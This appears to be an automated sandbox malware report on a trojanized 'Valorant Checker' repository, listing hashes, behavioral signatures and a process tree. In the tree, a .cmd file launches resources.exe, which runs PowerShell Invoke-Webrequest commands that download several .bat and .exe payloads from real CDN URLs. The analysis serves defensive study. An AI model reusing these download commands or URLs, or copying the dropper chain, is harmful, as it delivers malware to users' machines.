Overview
overview
10Static
static
3Valorant-C...er.exe
windows11-21h2-x64
7Valorant-C...ker.py
windows11-21h2-x64
3Valorant-C...le.exe
windows11-21h2-x64
8Valorant-C...up.bat
windows11-21h2-x64
1Valorant-C...CSS.py
windows11-21h2-x64
3Valorant-C...uth.py
windows11-21h2-x64
3Valorant-C...bot.py
windows11-21h2-x64
3Valorant-C...eck.py
windows11-21h2-x64
3Valorant-C...ker.py
windows11-21h2-x64
3Valorant-C...ers.py
windows11-21h2-x64
3Valorant-C...ata.py
windows11-21h2-x64
3Valorant-C...eck.py
windows11-21h2-x64
3Valorant-C...ll.bat
windows11-21h2-x64
1Valorant-C...ain.py
windows11-21h2-x64
3Valorant-C...inn.py
windows11-21h2-x64
3Valorant-C...es.exe
windows11-21h2-x64
8Valorant-C...uff.py
windows11-21h2-x64
3Valorant-C...ems.py
windows11-21h2-x64
3Valorant-C...trs.py
windows11-21h2-x64
3Valorant-C...ort.py
windows11-21h2-x64
3Valorant-C...ul.cmd
windows11-21h2-x64
8Valorant-C...rt.bat
windows11-21h2-x64
1Valorant-C...er.bat
windows11-21h2-x64
10Valorant-C...mpy.py
windows11-21h2-x64
3Valorant-C...sw.exe
windows11-21h2-x64
7Valorant-C.../sw.py
windows11-21h2-x64
3Valorant-C...cmp.py
windows11-21h2-x64
3Analysis
-
max time kernel
146s -
max time network
154s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
24/02/2024, 11:30
Behavioral task
behavioral1
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/checker.exe
Resource
win11-20240221-en
Behavioral task
behavioral2
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/checker.py
Resource
win11-20240221-en
Behavioral task
behavioral3
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/checkmodule.exe
Resource
win11-20240221-en
Behavioral task
behavioral4
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/chsetup.bat
Resource
win11-20240221-en
Behavioral task
behavioral5
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/PCSS.py
Resource
win11-20240221-en
Behavioral task
behavioral6
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/auth.py
Resource
win11-20240221-en
Behavioral task
behavioral7
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/bot.py
Resource
win11-20240221-en
Behavioral task
behavioral8
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/check.py
Resource
win11-20240221-en
Behavioral task
behavioral9
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/checker.py
Resource
win11-20240221-en
Behavioral task
behavioral10
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/checkers.py
Resource
win11-20240221-en
Behavioral task
behavioral11
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/data.py
Resource
win11-20240221-en
Behavioral task
behavioral12
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/fastcheck.py
Resource
win11-20240221-en
Behavioral task
behavioral13
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/install.bat
Resource
win11-20240221-en
Behavioral task
behavioral14
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/main.py
Resource
win11-20240221-en
Behavioral task
behavioral15
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/mainn.py
Resource
win11-20240221-en
Behavioral task
behavioral16
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/resources.exe
Resource
win11-20240221-en
Behavioral task
behavioral17
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/stuff.py
Resource
win11-20240221-en
Behavioral task
behavioral18
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/systems.py
Resource
win11-20240221-en
Behavioral task
behavioral19
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/trs.py
Resource
win11-20240221-en
Behavioral task
behavioral20
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/validsort.py
Resource
win11-20240221-en
Behavioral task
behavioral21
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/smmmodul.cmd
Resource
win11-20240221-en
Behavioral task
behavioral22
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/start.bat
Resource
win11-20240221-en
Behavioral task
behavioral23
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/updater.bat
Resource
win11-20240221-en
Behavioral task
behavioral24
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/vacwcbmpy.py
Resource
win11-20240221-en
Behavioral task
behavioral25
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/valorchksw/sw.exe
Resource
win11-20240221-en
Behavioral task
behavioral26
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/valorchksw/sw.py
Resource
win11-20240221-en
Behavioral task
behavioral27
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/vcmp.py
Resource
win11-20240221-en
General
-
Target
Valorant-Checker-Fast-Api-main/Valorant Checker/smmmodul.cmd
-
Size
40B
-
MD5
63d3668902029654d9323b2e4c5f762f
-
SHA1
660f8b571f7c2ff7652a22e03b45cef480a74dc6
-
SHA256
b27f89221aa7871f43fb77024485f569c6bc9e322ca9cef145e2b500bfa9fa02
-
SHA512
bfc279e9c8cf86ca960065b66dbfe1b1326df5b1cd6d8272f48e7792bd920dcb65e80ff35644285525d1b99f6ecdd98de50a4a0f7ee6802979309929cb7c52c7
Malware Config
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 16 1256 powershell.exe 17 468 powershell.exe 18 2088 powershell.exe 19 336 powershell.exe 20 1996 powershell.exe 21 4492 powershell.exe 22 3960 powershell.exe 23 2692 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 2 IoCs
pid Process 3700 timeout.exe 3640 timeout.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1256 powershell.exe 1256 powershell.exe 468 powershell.exe 468 powershell.exe 2088 powershell.exe 2088 powershell.exe 336 powershell.exe 336 powershell.exe 1996 powershell.exe 1996 powershell.exe 4492 powershell.exe 4492 powershell.exe 3960 powershell.exe 3960 powershell.exe 2692 powershell.exe 2692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1256 powershell.exe Token: SeDebugPrivilege 468 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 336 powershell.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 4492 powershell.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1348 wrote to memory of 3948 1348 cmd.exe 81 PID 1348 wrote to memory of 3948 1348 cmd.exe 81 PID 1348 wrote to memory of 3948 1348 cmd.exe 81 PID 3948 wrote to memory of 1076 3948 resources.exe 84 PID 3948 wrote to memory of 1076 3948 resources.exe 84 PID 3948 wrote to memory of 1076 3948 resources.exe 84 PID 1076 wrote to memory of 1256 1076 cmd.exe 86 PID 1076 wrote to memory of 1256 1076 cmd.exe 86 PID 1076 wrote to memory of 1256 1076 cmd.exe 86 PID 1076 wrote to memory of 468 1076 cmd.exe 87 PID 1076 wrote to memory of 468 1076 cmd.exe 87 PID 1076 wrote to memory of 468 1076 cmd.exe 87 PID 1076 wrote to memory of 2088 1076 cmd.exe 88 PID 1076 wrote to memory of 2088 1076 cmd.exe 88 PID 1076 wrote to memory of 2088 1076 cmd.exe 88 PID 1076 wrote to memory of 336 1076 cmd.exe 89 PID 1076 wrote to memory of 336 1076 cmd.exe 89 PID 1076 wrote to memory of 336 1076 cmd.exe 89 PID 1076 wrote to memory of 1996 1076 cmd.exe 90 PID 1076 wrote to memory of 1996 1076 cmd.exe 90 PID 1076 wrote to memory of 1996 1076 cmd.exe 90 PID 1076 wrote to memory of 4492 1076 cmd.exe 91 PID 1076 wrote to memory of 4492 1076 cmd.exe 91 PID 1076 wrote to memory of 4492 1076 cmd.exe 91 PID 1076 wrote to memory of 3640 1076 cmd.exe 92 PID 1076 wrote to memory of 3640 1076 cmd.exe 92 PID 1076 wrote to memory of 3640 1076 cmd.exe 92 PID 1076 wrote to memory of 3960 1076 cmd.exe 93 PID 1076 wrote to memory of 3960 1076 cmd.exe 93 PID 1076 wrote to memory of 3960 1076 cmd.exe 93 PID 1076 wrote to memory of 3700 1076 cmd.exe 94 PID 1076 wrote to memory of 3700 1076 cmd.exe 94 PID 1076 wrote to memory of 3700 1076 cmd.exe 94 PID 1076 wrote to memory of 2692 1076 cmd.exe 95 PID 1076 wrote to memory of 2692 1076 cmd.exe 95 PID 1076 wrote to memory of 2692 1076 cmd.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\smmmodul.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe"C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\5b24deb1-9771-4542-82f6-2d4da34417ed.bat3⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- Delays execution with timeout.exe
PID:3640
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 84⤵
- Delays execution with timeout.exe
PID:3700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c0636f2d138baca01dbb2eedb99bf3d5
SHA13b927899db0f3e2cb510782592887dc02fc3e400
SHA25610973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a
SHA5120187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d
-
Filesize
18KB
MD5e895c2aedf9d4b883d242cb9a16ca3c4
SHA1012215e7782d314b156788eafb0e39c38d1f8aea
SHA2560b1480efb637e7cc26eedad312715fae05f6ab5a892ee2e27e92456a3be8c4cd
SHA51284428fc4026983b015f503aa2a51679a027eda63e290042483663ff7928fa818f235ca84eeac267857111cda72724bd41d4f017714cff6c1558125d89195f211
-
Filesize
18KB
MD5ecc0bf8e63d09e4b4b69a16d7e05024d
SHA16d5afd75f66bad8e075bf6df7eff1556ca9013b3
SHA256e9d746db5a9ca664d02c4fd5d5c6ac450cbe9baeb13e8529485da4b9d43a3698
SHA512cee10715353e7926476892460637ace274fd60edf503f345696f080edcfadabda74b0c2c1060d7bd42506436c08204d9bd803986cab917aa14274cf1bf98aea1
-
Filesize
18KB
MD571c0df38a184bdfc0a0b46236b04319b
SHA10ec6c4b0321d8cd940762acb3bffd2979bec161e
SHA256d0457a6767d1eb7c72ea69451fd7eefb8716e7c5ee013b43891b69b8deca69d0
SHA51255f8fb16e5b87fd81751a7c92d9164c6897f6c1e90ff7f8a8978bf0cf900ada93b210b867cf7648681a81317bbef0304429bdaa42bc78e23ab06ae6bc818023b
-
Filesize
18KB
MD5e99da2b0042a75fc9304eec6c911a41a
SHA16b934f3b59bad76266b8ef90e17ecdb9088ee1f0
SHA256676761b84405735cd2c2eebd1ecb57b2dd6dfa4efd224a174a10fb05c6a6a942
SHA512d4cfac4c89e3def934af427cf0c854e60fadd791cf92f6b4a25a379afbbe3a06580335bff6cf3b147732aa7aa70f19fe10e3dd8f41504ac17d970c961ec85f17
-
Filesize
18KB
MD59cdbfb010b3c4127e2ef260dbdf6100f
SHA1f72d8906eb89ed74e67a17f3d754a1aacba79ffd
SHA256357141e2eaa1f9bb6b0428677987e95ca2ea3ef5ce39aa018eab9bc43a0a85b1
SHA512e43066c86b69eb733145db07599e3be1cadcbf8ecddf239ac475cdfb180c1ebffd82547beabcb319d962d8214289ed1082dfdc7bbded78f92ff4e976c70a660e
-
Filesize
18KB
MD5adf3d185a8397bf1d8d070660616e196
SHA1ae89ba5683ca86b417f5faa69e9a0990c55b7921
SHA25682a63442681aee3cb13967f00b1d12f2724b0798736eb27ef4cf12fff9ad479a
SHA512f869d24b069cf2b85a43e764388ae9df02b8c4b07245128ce7aa94de32b7d38ecf24fcf8cc8790a95c65fd15475128ab6d0bd69fc93bcfea428919b79dfa2854
-
Filesize
18KB
MD52bc372a96d86133066f1354d56f37ee5
SHA1fce219b2d82c4d1ec4d00aa11857fe7d9cbbc095
SHA2562c2b635aaff07058bb941dc8d3027bedbc69cab80b2170d7ca8cebfcd7d5bba3
SHA5122b8ce1f9d5830ce599179940976d1388ba8d9aca3e68f315941095afb1eec28db3aab91b7e4533eab5375da3ba3e6f4feb2f079f45f4b9782580684a337748b8
-
Filesize
1KB
MD5d0cec99ca3a717c587689ebf399662c4
SHA11d4bbaf8079912ada46a6fa8693d8c20d5ec5b66
SHA256b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228
SHA51299b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82